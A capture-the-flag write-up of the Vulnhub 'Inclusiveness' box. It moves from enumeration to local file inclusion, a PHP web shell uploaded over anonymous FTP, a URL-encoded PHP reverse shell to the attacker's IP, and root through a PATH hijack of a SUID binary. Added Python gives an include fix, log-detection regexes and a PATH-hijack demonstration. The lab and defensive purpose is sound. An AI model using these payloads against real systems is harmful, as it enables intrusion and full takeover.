PG Play/Vulnhub | INCLUSIVENESS — WriteUp

Mandoy
6 min read · Jun 1, 2021

Box 2/40

My second writeup for OSCP preparation.

RECONNAISSANCE

Also called the information-gathering phase: the goal is to collect as much information as possible about the target.

I’ll start off by running an nmap scan: nmap -p- -sS -Pn -n -T4 --min-rate=3000 $RHOST. Nmap discovered the following open ports and services:

nmap -p- -sS -Pn -n -T4 --min-rate=3000 192.168.128.14
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 23:27 EDT
Warning: 192.168.128.14 giving up on port because retransmission cap hit (6).
Nmap scan report for 192.168.128.14
Host is up (0.24s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 28.35 seconds

Next, run a more thorough nmap scan against the open ports to gather version and script output. This is valuable for an attacker because it gives detailed information on potential attack vectors into the system.

nmap -p21,22,80 -sC -sV -O -Pn -n 192.168.128.14
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 23:25 EDT
Nmap scan report for 192.168.128.14
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 0 0 4096 Feb 08 2020 pub [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.49.128
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 06:1b:a3:92:83:a5:7a:15:bd:40:6e:0c:8d:98:27:7b (RSA)
| 256 cb:38:83:26:1a:9f:d3:5d:d3:fe:9b:a1:d3:bc:ab:2c (ECDSA)
|_ 256 65:54:fc:2d:12:ac:e1:84:78:3e:00:23:fb:e4:c9:ee (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.12 (94%), Linux 4.4 (94%), Linux 4.9 (94%), Linux 4.0 (92%), Linux 2.6.18 (91%), Linux 3.10 (91%), Linux 3.10 - 4.11 (90%), Linux 3.11 - 4.1 (90%), Linux 3.18 (90%), Linux 3.2 - 4.9 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.28 seconds

ENUMERATION

It is defined as the process of extracting user names, machine names, network resources, shares and services from a system. In this phase, the attacker creates an active connection to the system and performs directed queries to gain more information about the target.

PORT 21 — FTP

A vsFTPd 3.0.3 server on port 21 with anonymous access enabled, but no interesting or useful file in it. There is no known public vulnerability for this version.

PORT 22 — SSH

Valid credentials are needed to connect here.

PORT 80 — HTTP

Browsing to http://192.168.128.14 shows the Apache2 Debian default page.

Check whether robots.txt is available; as shown below, I can’t read robots.txt with a normal browser request.

To bypass this restriction, present a search-engine User-Agent. I used curl with a custom User-Agent header and read robots.txt. As shown below, I’m now able to read the disallowed entry “/secret_information/”. A User-Agent check is not access control: the header is entirely client-controlled, so anything it “hides” should be treated as public.

Browsing to http://192.168.128.14/secret_information brings up a web page that describes a “DNS Zone Transfer Attack” and contains two hyperlinks, “English” and “Spanish.” Clicking one of them shows that the page uses a lang parameter to locate the resource en.php on the file system. The parameter is possibly vulnerable to file inclusion.

EXPLOITATION

This is where an attacker/pentester breaks into or gains access to the system.

File inclusion vulnerabilities are divided into Local File Inclusion (LFI) and Remote File Inclusion (RFI). Both are often found in poorly written web applications. They occur when a web application builds the path of a file to include from user-supplied input without validating it.

Local File Inclusion (LFI) vulnerabilities allow an attacker to read and sometimes execute local files on the web server (including log files and configuration files containing password hashes or even clear-text passwords). The lang parameter is vulnerable to LFI: supplying the path of any readable local file makes the PHP include load it. I try to get the /etc/passwd file by abusing the include and, as a result, I get the whole contents of /etc/passwd as shown in the image below.
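To make the mechanism concrete, here is an added Python model of the flaw and of its fix; it is not code from the box or from this writeup. The web root /var/www/html/secret_information, the Spanish file name es.php and the sample request values are assumptions, chosen so that the four-level traversal used in this writeup lands where it did on the box.

```python
import posixpath
from typing import Optional

# Added example, not code from the box. The web root is an assumption chosen so
# that four "../" steps, as in this writeup, climb to "/".
WEB_ROOT = "/var/www/html/secret_information"
ALLOWED_FILES = {"en.php", "es.php"}   # en.php is from the writeup; es.php is assumed


def resolve_lang_unsafe(lang: str) -> str:
    """Models include($_GET['lang']) resolved relative to the script's directory:
    the parameter is joined onto the web root with no validation at all."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, lang))


def resolve_lang_safe(lang: str) -> Optional[str]:
    """Allow-list fix: the request may only name one of the known language files.
    Anything else (including any value containing a separator) is rejected."""
    if lang not in ALLOWED_FILES:
        return None
    return posixpath.join(WEB_ROOT, lang)


def escapes_web_root(resolved: str) -> bool:
    """Defensive post-check for any resolver: the final path must stay under WEB_ROOT."""
    return not (resolved == WEB_ROOT or resolved.startswith(WEB_ROOT + "/"))


def classify(lang: str) -> dict:
    """Show both resolvers side by side for one request value."""
    unsafe = resolve_lang_unsafe(lang)
    return {
        "lang": lang,
        "unsafe_path": unsafe,
        "unsafe_escapes_root": escapes_web_root(unsafe),
        "safe_path": resolve_lang_safe(lang),
    }


# Constructed request values: the legitimate one, the two traversal payloads that
# appear in this writeup, and an absolute path (posixpath.join discards WEB_ROOT for it).
SAMPLE_REQUESTS = [
    "en.php",
    "../../../../etc/passwd",
    "../../../../var/ftp/pub/php-cmd.php",
    "/etc/passwd",
]

if __name__ == "__main__":
    for value in SAMPLE_REQUESTS:
        print(classify(value))
```

The point of escapes_web_root is that a normalised-path check alone is not enough when the include target is chosen by the client: the allow-list is the real fix, and the post-check is a second line of defence for code that cannot be rewritten yet.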

Remote File Inclusion (RFI) vulnerabilities are easier to exploit but less common. Instead of accessing a file on the local machine, the attacker can include files from a remote location. Let’s see if I can include a remote file as well by entering an external URL in the lang parameter. I hosted a simple HTTP server and pointed the lang parameter at it; nothing happened, so the page is not vulnerable to RFI.

Since I can access FTP with an anonymous login, let’s check whether I can read the vsftpd configuration file through the LFI.

The config file shows that the vsftpd root directory is /var/ftp and that write permission is enabled. I create a minimal PHP web shell.

<?php system($_REQUEST['cmd']) ?>

Upload the PHP file to the FTP pub directory.

ftp 192.168.128.14
cd pub
put php-cmd.php

Test whether the PHP payload works. As shown below, I can execute commands through it.

To get a reverse connection, first start a listener.

nc -nvlp 80

URL-encode the one-liner PHP reverse shell payload.

php%20-r%20%27%24sock%3Dfsockopen(%22192.168.49.128%22%2C80)%3Bexec(%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B%27

Execute the PHP reverse shell payload through the web shell.

192.168.128.14/secret_information/?lang=../../../../var/ftp/pub/php-cmd.php&cmd=php%20-r%20%27%24sock%3Dfsockopen(%22192.168.49.128%22%2C80)%3Bexec(%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B%27

Once the exploit is executed successfully, I receive a reverse shell connection on port 80 as www-data.
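From the defender’s side, the chain above leaves a clear trace in the web server’s access log. The following Python is an added example, not part of this writeup: it parses Apache combined-format log lines (constructed here to mirror the requests made in this writeup) and flags traversal in any query parameter and shell-like content in a parameter named cmd. The parameter names in CMD_PARAMS, the regular expressions and the log lines are my assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Added example, not part of the writeup. Apache "combined" log format is assumed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)
# Plain and percent-encoded "../" (plus the backslash variant) as seen after one decoding pass.
TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\|%2e%2e%2f|%2e%2e/|\.\.%2f", re.IGNORECASE)
# Parameter names a dropped web shell commonly reads (assumed list; "cmd" is from the writeup).
CMD_PARAMS = {"cmd", "c", "exec", "command"}
# Substrings that make a parameter value look like a shell command rather than data.
SHELL_RE = re.compile(r"[;|&`$]|/bin/|php -r|fsockopen")


def analyse_request(uri: str) -> dict:
    """Return the request path and a list of findings for one request URI."""
    parts = urlsplit(uri)
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes %XX once
    findings = []
    for name, values in params.items():
        for value in values:
            twice = unquote(value)  # second pass catches double-encoded payloads
            if TRAVERSAL_RE.search(value) or TRAVERSAL_RE.search(twice):
                findings.append(f"traversal in parameter '{name}'")
            if name.lower() in CMD_PARAMS and SHELL_RE.search(twice):
                findings.append(f"shell-like content in parameter '{name}'")
    return {"path": parts.path, "findings": findings}


def scan_log(lines) -> list:
    """Run analyse_request over raw log lines and keep only the ones with findings."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        result = analyse_request(m.group("uri"))
        if result["findings"]:
            alerts.append({"ip": m.group("ip"), "status": m.group("status"), **result})
    return alerts


# Constructed log lines: a legitimate language switch, the /etc/passwd read, and the
# web-shell call carrying the URL-encoded reverse shell from this writeup.
SAMPLE_LOG = [
    '192.168.49.128 - - [31/May/2021:23:40:01 -0400] "GET /secret_information/?lang=en.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.168.49.128 - - [31/May/2021:23:41:15 -0400] "GET /secret_information/?lang=../../../../etc/passwd HTTP/1.1" 200 1432 "-" "curl/7.74.0"',
    '192.168.49.128 - - [31/May/2021:23:45:30 -0400] "GET /secret_information/?lang=../../../../var/ftp/pub/php-cmd.php&cmd=php%20-r%20%27%24sock%3Dfsockopen(%22192.168.49.128%22%2C80)%3Bexec(%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B%27 HTTP/1.1" 200 0 "-" "curl/7.74.0"',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Two things worth noting when turning this into a real rule: a 200 status on a traversal request is the strongest signal (a hardened include would return an error), and the anonymous FTP upload that precedes the web-shell request is visible in the vsftpd log, so correlating the two sources gives the full picture.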

PRIVILEGE ESCALATION

It is the process of increasing the level of user privileges on a certain host to the highest permission level.

Checking the /home/tom directory, I found an interesting source file, rootshell.c, and its compiled binary rootshell, which has the SUID bit set.

According to the code, it executes whoami and checks whether the current user is tom. If the current user is tom, it escalates to the highest privilege; otherwise it only prints the current user’s id.

Create a whoami file in the /tmp directory and make it executable.

echo 'printf "tom"' > /tmp/whoami
chmod +x /tmp/whoami

Prepend /tmp to the target system’s PATH and check that it changed.

export PATH=/tmp:$PATH
echo $PATH

Execute the rootshell binary.

cd /home/tom
./rootshell

Once the binary runs, I obtain a root shell.
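The rootshell binary described above trusts two things it should not: the caller’s PATH and the text printed by whoami. The following Python is an added example, not the box’s rootshell.c: it plants a fake whoami in a throw-away directory (a constructed stand-in for the /tmp/whoami used in this writeup), shows that a PATH search finds the fake first, and contrasts the output-parsing check with a check on the real uid. TRUSTED_PATH is an assumption; nothing here is SUID.

```python
import os
import shutil
import stat
import subprocess
import tempfile

# Added example, not the box's rootshell.c. TRUSTED_PATH is an assumption: a fixed
# search path a privileged program should set for itself instead of inheriting one.
TRUSTED_PATH = "/usr/bin:/bin"


def resolve_command(cmd: str, path_env: str):
    """The file that system("whoami") would actually run: first hit on PATH, left to right."""
    return shutil.which(cmd, path=path_env)


def plant_fake_whoami(directory: str) -> str:
    """Constructed stand-in for the attacker's /tmp/whoami from the writeup."""
    fake = os.path.join(directory, "whoami")
    with open(fake, "w") as fh:
        fh.write('#!/bin/sh\nprintf "tom"\n')
    os.chmod(fake, os.stat(fake).st_mode | stat.S_IXUSR)
    return fake


def is_target_user_unsafe(path_env: str, target_name: str = "tom") -> bool:
    """Vulnerable pattern: believe whatever the PATH-resolved 'whoami' prints."""
    exe = resolve_command("whoami", path_env)
    if exe is None:
        return False
    out = subprocess.run([exe], capture_output=True, text=True).stdout.strip()
    return out == target_name


def is_target_user_safe(target_uid: int) -> bool:
    """Fix: ask the kernel for the real uid. No child process, no PATH, nothing the
    caller's environment can influence."""
    return os.getuid() == target_uid


def demo() -> dict:
    """Plant the fake, then compare what each approach concludes."""
    workdir = tempfile.mkdtemp(prefix="pathdemo_")
    try:
        fake = plant_fake_whoami(workdir)
        hijacked = f"{workdir}:{TRUSTED_PATH}"   # same shape as PATH=/tmp:$PATH
        return {
            "fake": fake,
            "resolved_hijacked": resolve_command("whoami", hijacked),
            "resolved_trusted": resolve_command("whoami", TRUSTED_PATH),
            "unsafe_check_hijacked": is_target_user_unsafe(hijacked),
            "unsafe_check_trusted": is_target_user_unsafe(TRUSTED_PATH),
            "safe_check_own_uid": is_target_user_safe(os.getuid()),
        }
    finally:
        shutil.rmtree(workdir)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The fix a developer would apply in rootshell.c is the same idea as is_target_user_safe: compare getuid() with the intended uid, and if a child process is unavoidable, call it by absolute path after setting PATH explicitly. A SUID binary must never let the caller’s environment choose which program runs.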
